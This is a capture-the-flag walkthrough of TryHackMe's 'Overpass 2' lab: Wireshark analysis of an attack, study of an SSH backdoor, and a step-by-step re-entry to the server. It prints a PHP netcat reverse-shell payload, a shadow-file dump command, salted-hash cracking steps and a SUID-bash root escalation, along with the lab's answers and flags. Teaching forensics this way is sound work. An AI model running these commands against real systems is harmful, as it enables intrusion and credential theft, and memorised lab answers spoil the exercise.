THM Machine: Overpass 2 - Hacked

Link: Overpass 2 - Hacked

Overview

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, it and managed to capture packets as the attack happened.

Q: Can you work out how the attacker got in, and hacked your way back into Overpass' production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.

md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc

Task 1 Forensics - Analyse the PCAP

First Download the Capture file from TryHackme Overpass 2 room, you will see the button named Download Task File. Download it and open Wireshark which is preinstalled in Kali linux. When wireshark is open go to the File menu in the Toolbar you will see the option name Open or you can just press, Ctrl + Oyou will be prompted to open a file and select the file that you Download from tryhackme.

When you open the file then you will see all the packets that are captured during the attack so now let's start the analysis

First, we have to filter packets to see only http traffic. As there are so many packets we cannot see all of them so we have to filter it. To filter go to the filter bar that can be found after the Toolbar. Write HTTP in it and press enter and you will see all the packets that are related to the http protocol.

When your result is filtered locate the packet that is used to upload a file name "upload.php". You can see this in the info tab of the packets there you will see all information related to that http packet like url, method, and its data. Find the URL the attacker use to get the reverse shell. The attacker uses the POST method to that link to Upload its Payload to the server

Q: What was the URL of the page they used to upload a reverse shell?

A: /development/

Now we know what endpoint the attacker used to upload a reverse shell payload on the server. The attacker uses the upload.php endpoint to upload a file name payload.php that contains some malicious php code that gives the attacker the power to execute a system command and get a reverse shell. We can see the content/data of that packet to identify what payload is used and what it does to the system.

We focus on packet number 14 that is the packet contains the upload.php function, you just have to see the data of that packet. You can see that at the bottom tab of the wireshark. Click on it and all the packet data where shown in that tab scroll down to the content and focus on it. There you will see the php code inside that packet.

Q: What payload did the attacker use to gain access?

Hint: Include the PHP tags. Whole file content.

A: <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

We know which packet has the information about the attack that is used to activate the reverse shell. We know which website directory the attacker goes to upload a file name pyalod.php that has a malicious payload to that execute a system command and we also know which file they use to upload a payload file. Now the attacker uploads a working rev-shell payload file they did not give him a reverse shell until the attacker visits it. The attacker goes to that endpoint /development/payload.php and then the malicious php code executes on the server and which gives the attacker the reverse shell.

We can see the attacker send a GET request to /development/uploads/payload.php. After that attacker get the TCP reverse shell connections. Now we have to analyze the TCP packet for that first we have to remove all the filters and then view all the packets after the packet number 27 i.e that contains the http packet information. By reading all the packets one by one we see some packets that contain some useful output. We see the attacker use just a normal enumeration like use ls command to list all the directories and use python3 to get full pty shell. We can see all its movement and command by just viewing all the packets. In one packet we see the attacker use "su james" command and in the shell prompt enter his password. But that can easily be read through the packets.

Q3: What password did the attacker use to privesc?

Hint: A netcat reverse shell transmits everything in plaintext!

A: whenevernoteartinstant

As we continue our packet analysis and we see all the activities attackers use to get better privileges. The attacker uses common methods like using the "sudo -l" command to know the james user sudo permissions. They see he can use all the commands with sudo so and then the attacker uses it to see the content of the linux shadow file with the command "sudo cat /etc/shadow". They successfully see the content of shadow the file now the attacker has all the password hashes of the registered user and also has full privileges to the overpass server.

After getting full privileged to the server attacker try to add a ssh backdoor to the server and we can see that in the packet. When we move to the packet number 121 we see the attacker use the git clone command to download some files in the server.

Q4: How did the attacker establish persistence?

A:  https://github.com/NinjaJc01/ssh-backdoor

In packet Number 114 attacker used "sudo cat /etc/shadow" to see the content of the /etc/shadow file. We can also see the content of that file also in the wireshark. Note all the shadow file content and use tools like john or hashcat to crack the password with the wordlist "fasttrack.txt".

$ john [shadow_file_hash_here] --wordlist=fasttrack.txt

Here is a fun Tip about WireShark If you just click on the packet where the attacker interacts with the bash reverse shell like the packet where the attacker uses the "ls" command. Right Click on that packet and it will open a drop-down menu, You will see an option named "Follow" Hover into that option and you will see a Sub-drop-down menu. You will see an option named "TCP stream" Click on it or you can just use "Ctrl+Alt+Shift+T" on that packet and you will see all the bash commands the attacker uses in the system in clean packet stream format.

Q5: Using the fasttrack wordlist, how many of the system passwords were crackable? Hint: Did the attacker dump the shadow file? Try cracking them yourself.

A: 4

Task 2 Research - Analyze the code

Now that you've found the code for the backdoor, it's time to analyze it.

In the previous Task, we found out that the attacker downloads a backdoor file from the github using the following link: https://github.com/NinjaJc01/ssh-backdoor

Now we can analyze that code go to the above link to see its source code. The file name is "main. go" there you will see a variable name "hash string". In that variable, you will find the default hash for the backdoor

Q1: What's the default hash for the backdoor?

Hint: Variable values!

A: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

Read all the code to get a rough idea of what that code does. Read all the way to the end and in the last line, you will find the salt hash that is used in the backdoor. Keep it in your notes.

Q2: What's the hard-coded salt for the backdoor?

Hint: If you read the code, you can fairly quickly see what salt is provided to the function call.

A:  1c362db832f3f864c8c2fe05f2002a05

Come back to wireshark and start your packet analyses after the backdoor is downloaded. In wireshark packet number 3479 you can see the attacker uses the "./backdoor" command and pass the -a flag, after that attacker put its own hash.

Q3: What was the hash that the attacker used? - go back to the PCAP for this!

Hint: Reading the code, the -a or --a [hash] the flag can be used to supply a hash at runtime.

A: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Now we have to crack the hash attacker used in the ssh backdoor. we can use any regular cracking tool for this but I use Hashcat. So first we have to know what type of hash the attacker uses to do that we can use the hash-identifier the tool you can install it with the following command

$ sudo apt install hash-identifier

When this will install open it using the simple command "hash-identifier" and paste the hash in the tool they will show you the hash type

$ hash-identifier

   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Possible Hashs:
[+] SHA-512
[+] Whirlpool

Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
----------------------------------------------------------------------------------

As you can see Most Possible hash is SHA-512 but we can't crack it using the online tool because they add salt to that hash, We have to use our cracking tools like hashcat and john.

Now follow the following steps to crack that hash using hash cat

Step 1:

• In the first step, we have to find the hashcat code for sha512 with salt to do that we use the following command

$ hashcat --help | grep sha512

This will show us all the hashcat code/numbers that is for sha512 but we have to pick the one that has passed with salt because our hash use salt in it so we can use the following hash code.

1710 | sha512($pass.$salt)               | Raw Hash, Salted and/or Iterated

After knowing which hashcat code we have used now we can start cracking the hash step

Step 2:

• In this step, we first have to make two files one name is hash, and the other one is cracked or you can use your own name of your choice. In the hash file, you have to write the hash you want to crack but you have to focus on the format because this is a salted hash and you must have to write the hash in the following format otherwise it will not be cracked.

Hash:Salt

The following format is in our hash file, we write the attacker hash and the backdoor salt is like this

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

That's it now we use the following hashcat command to crack that hash

Command:

$ hashcat -m 1710 -a 0 hash rockyou.txt -o cracked

• -m: This is used to specify the hashcat cracking method i.e 1710 is for Sha512 with salt

• -a: This is used to specify hashcat attacking mode i.e 0 is for wordlist attack

• hash: This is the hash file we create and that contains our hash with salt

• rockyou.txt: This is the wordlist we use to crack that hash.

• cracked: This is the file where hashcat save the cracked password after successful cracking

When the hashcat finish the cracking we found our cracked password in the cracked file just use the "cat" command to see the cracked file content

Q4: Crack the hash using rockyou.txt and a cracking tool of your choice. What's the password?

Hint: It's salted, so make sure you use the correct mode. This also means crackstation etc won't work.

A: november16

Task 3 Attack - Get back in!

Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.

There are flags on the box that Overpass can't afford to lose by formatting the server!

Enumeration

Nmap scan Report

$ nmap -sCV 10.10.142.182
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:05 Pakistan Standard Time
Stats: 0:01:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.76% done; ETC: 15:06 (0:00:00 remaining)
Nmap scan report for 10.10.142.182
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap did: 1 IP address (1 host up) scanned in 71.16 seconds

We can see from our nmap scan report there are three open ports in the server. One is for http and the remaining two have ssh service running on it and we know the port 22 is opened by the overpass management but the port 2222 is opened by the attacker and that is a backdoor added by the attacker. We complete our analysis and we know the password for the attacker's ssh backdoor we also know they use the username James. Now we can use an attacker backdoor with all the information we have to get access to the system again using the following command

Q: Using the information you've found previously, hack your way back in!

Initial Access

$  ssh james@10.10.142.182 -p 2222

Where

• -p: To specify port number because they are not located in a well-known port

Give him the password you cracked in the previous task using hashcat and you will login to the server

Now you have access to the system go to the home directory of the James user and in their home directory you will find the user.txt file that contains the flag and submit it to THM

Q: What's the user flag? Hint: The backdoor! It only checks the password.

A: thm{d119b4fa8c497ddb0525f7ad200e6567}

When going to the overpass website's main page attackers change the page layout and use some pictures and Change the heading. After that, they write the message "Secure your Servers!"

Q: The attacker defaced the website. What message did they leave as a heading?

A: H4ck3d by CooctusClan

Privilege Escalation

When we use the find with the following syntax to find binaries that have suid permission set.

$ find / -perm /4000 2>/dev/null

We found out that there is a file in the James home directory with the name ".suid_bash" and they are owned by the root user. When we search bash on GTFObins we found out that if we use "bash -p". We can get root access that is also a backdoor to get high privilege again.

$ ./.suid_bash -p

We got the root access now go to the root directory and read the root.txt flag

Q: What's the root flag?

Hint: Did the attacker leave a quick way for them to get root again without a password?

A: thm{d53b2684f169360bb9606c333873144d}